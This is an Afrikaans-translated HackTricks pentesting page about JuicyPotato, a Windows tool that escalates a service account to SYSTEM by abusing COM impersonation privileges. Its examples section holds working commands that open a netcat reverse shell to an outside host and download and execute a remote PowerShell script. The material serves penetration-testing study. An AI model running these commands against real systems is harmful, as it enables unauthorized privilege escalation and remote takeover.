11 KiB
JuicyPotato
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
- Werk jy by 'n cybersecurity-maatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die INSKRYWINGSPLANNE!
- Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
- Kry die amptelike PEASS & HackTricks swag
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die hacktricks-opslag en hacktricks-cloud-opslag.
WhiteIntel
WhiteIntel is 'n dark-web aangedrewe soekenjin wat gratis funksies bied om te kyk of 'n maatskappy of sy kliënte deur steel-malware gekompromitteer is.
Die primêre doel van WhiteIntel is om rekening-oorneeminge en lospryse-aanvalle te beveg wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin vir gratis probeer by:
{% embed url="https://whiteintel.io" %}
{% hint style="warning" %}
JuicyPotato werk nie op Windows Server 2019 en Windows 10 bou 1809 en later nie. Nietemin kan PrintSpoofer, RoguePotato, SharpEfsPotato gebruik word om dieselfde voorregte te benut en NT AUTHORITY\SYSTEM vlaktoegang te verkry. Kyk:
{% endhint %}
{% content-ref url="roguepotato-and-printspoofer.md" %} roguepotato-and-printspoofer.md {% endcontent-ref %}
Juicy Potato (misbruik van die goue voorregte)
'n Gesuikerde weergawe van RottenPotatoNG, met 'n bietjie sap, d.w.s. 'n ander plaaslike voorreg-escalasie-instrument, van 'n Windows-diensrekening na NT AUTHORITY\SYSTEM
Jy kan juicypotato aflaai van https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts
Opsomming
RottenPotatoNG en sy variante benut die voorreg-escalasieketting gebaseer op BITS diens met die MiTM-luisteraar op 127.0.0.1:6666 en wanneer jy SeImpersonate of SeAssignPrimaryToken voorregte het. Tydens 'n Windows-bouhersiening het ons 'n opstelling gevind waar BITS opsetlik uitgeskakel was en poort 6666 geneem was.
Ons het besluit om RottenPotatoNG te bewapen: Sê hallo aan Juicy Potato.
Vir die teorie, sien Rotten Potato - Voorreg-escalasie vanaf Diensrekeninge na SYSTEM en volg die ketting van skakels en verwysings.
Ons het ontdek dat, behalwe BITS, daar 'n paar COM-bedienerse is wat ons kan misbruik. Hulle moet net:
- installeerbaar wees deur die huidige gebruiker, normaalweg 'n "diensgebruiker" wat impersonasievoorregte het
- die
IMarshal-koppelvlak implementeer - as 'n verhewe gebruiker hardloop (SYSTEM, Administrateur, ...)
Na 'n bietjie toetsing het ons 'n uitgebreide lys van interessante CLSID's op verskeie Windows-weergawes verkry en getoets.
Sappige besonderhede
JuicyPotato laat jou toe om:
- Teiken CLSID kies enige CLSID wat jy wil. Hier kan jy die lys georganiseer volgens OS vind.
- COM-luisterpoort definieer die COM-luisterpoort wat jy verkies (in plaas van die gemarshalleerde hardgekoppelde 6666)
- COM-luister-IP-adres bind die bediener aan enige IP
- Proseskeuringsmodus afhangende van die geïmpersonaliseerde gebruiker se voorregte kan jy kies uit:
CreateProcessWithToken(benodigSeImpersonate)CreateProcessAsUser(benodigSeAssignPrimaryToken)beide- Proses om te begin begin 'n uitvoerbare lêer of skrifleer as die uitbuiting slaag
- Prosesargument pas die beginproses-argumente aan
- RPC-bedieneradres vir 'n sluipende benadering kan jy aanmeld by 'n eksterne RPC-bediener
- RPC-bedienerpoort nuttig as jy wil aanmeld by 'n eksterne bediener en die firewall poort
135blokkeer... - TOETS-modus hoofsaaklik vir toetsdoeleindes, d.w.s. toetsing van CLSIDs. Dit skep die DCOM en druk die gebruiker van die token. Sien hier vir toetsing
Gebruik
T:\>JuicyPotato.exe
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
Laaste gedagtes
As die gebruiker SeImpersonate of SeAssignPrimaryToken voorregte het, is jy SYSTEM.
Dit is amper onmoontlik om die misbruik van al hierdie COM-bediener te voorkom. Jy kan dalk dink om die toestemmings van hierdie voorwerpe te wysig via DCOMCNFG maar sterkte daarmee, dit gaan 'n uitdaging wees.
Die werklike oplossing is om sensitiewe rekeninge en toepassings wat onder die * SERVICE-rekeninge loop, te beskerm. Om DCOM te stop sal hierdie uitbuiting sekerlik belemmer, maar dit kan 'n ernstige impak op die onderliggende bedryfstelsel hê.
Van: http://ohpe.it/juicy-potato/
Voorbeelde
Nota: Besoek hierdie bladsy vir 'n lys van CLSIDs om te probeer.
Kry 'n nc.exe omgekeerde dopshell
c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
c:\Users\Public>
Powershell omgekeer
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
Begin 'n nuwe CMD (as jy RDP-toegang het)
CLSID Probleme
Dikwels werk die verstek CLSID wat JuicyPotato gebruik nie en misluk die uitbuiting. Gewoonlik neem dit verskeie pogings om 'n werkende CLSID te vind. Om 'n lys van CLSIDs te kry om te probeer vir 'n spesifieke bedryfstelsel, moet jy hierdie bladsy besoek:
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
Kontroleer CLSIDs
Eerstens, sal jy 'n paar uitvoerbare lêers benodig buite juicypotato.exe.
Laai Join-Object.ps1 af en laai dit in jou PS-sessie, en laai dan GetCLSID.ps1 af en voer dit uit. Daardie skripsie sal 'n lys van moontlike CLSIDs skep om te toets.
Laai dan test_clsid.bat (verander die pad na die CLSID-lys en na die juicypotato-uitvoerbare lêer) af en voer dit uit. Dit sal begin om elke CLSID te probeer, en wanneer die poortnommer verander, sal dit beteken dat die CLSID gewerk het.
Kontroleer die werkende CLSIDs deur die parameter -c te gebruik
Verwysings
WhiteIntel
WhiteIntel is 'n donkerweb-aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur diefstal-malware gekompromitteer is.
Die primêre doel van WhiteIntel is om rekening-oorneemings en lospryse-aanvalle te beveg wat voortspruit uit inligtingsteel-malware.
Jy kan hul webwerf besoek en hul enjin gratis probeer by:
{% embed url="https://whiteintel.io" %}
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
- Werk jy in 'n cybersekuriteitsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die INSKRYWINGSPLANNE!
- Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
- Kry die amptelike PEASS & HackTricks-klere
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die hacktricks-opslag en hacktricks-cloud-opslag.